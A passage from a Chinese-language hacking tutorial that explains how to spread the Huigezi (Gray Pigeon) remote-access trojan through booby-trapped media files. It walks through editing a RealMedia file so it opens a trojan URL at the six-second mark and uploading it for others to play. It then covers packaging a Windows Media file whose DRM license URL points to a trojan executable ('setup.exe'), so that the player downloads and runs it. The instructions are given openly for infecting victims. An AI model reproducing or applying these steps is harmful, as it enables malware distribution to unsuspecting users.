黑客新技术 灰鸽子巧妙利用全攻略

四、利用播放器漏洞传播灰鸽子木马

   　　工具:real media editor汉化版

　　real player网页木马生成器

　　china-drm wmdrm

　　我们打开real media editor.如图9

次点’文件”---“打开real媒体文件”选择一个RM文件，然后依次点”工具”，“合并事件”我们加入一个事件.好!讲角下.1.txt是干什么的呢，我们打开看下，命令如下u 00:6.0 00:10.0 http://www.baidu.com，这句话的意思是说RM文件播放到第6秒的时候自动打开http://www.baidu.com换成我们木马的地址会是什么样呢?我不敢往下想!最后我们点”文件”下的”REAL文件另存为”即可.我们可以将这个RM文件传到网上，等着人家点击吧.至于real player网页木马生成器，就不介绍了。

　　下面再来说说怎么用microsoft Media player传播木马，至于原理，就不说了，我们用到的工具是wmdrm，如图.10.先在”自定义打包”，”源文件”，”浏览”处选择一个适合的类型(wmv，wma，asf，wms)然后在”认证字符串”，”认证url” 处填写我们的木马地址http://www.xxx.cc.com/setup.exe，最后我们回到”自定义打包”，在”输出文件后缀”处填写一个合适的反缀.比如.wma，点”打包加密”文件就生成了.我们打开刚才生成的文件会出现如图11所示的情形，如果点确定.那么播放器就会下载我们木马运行了。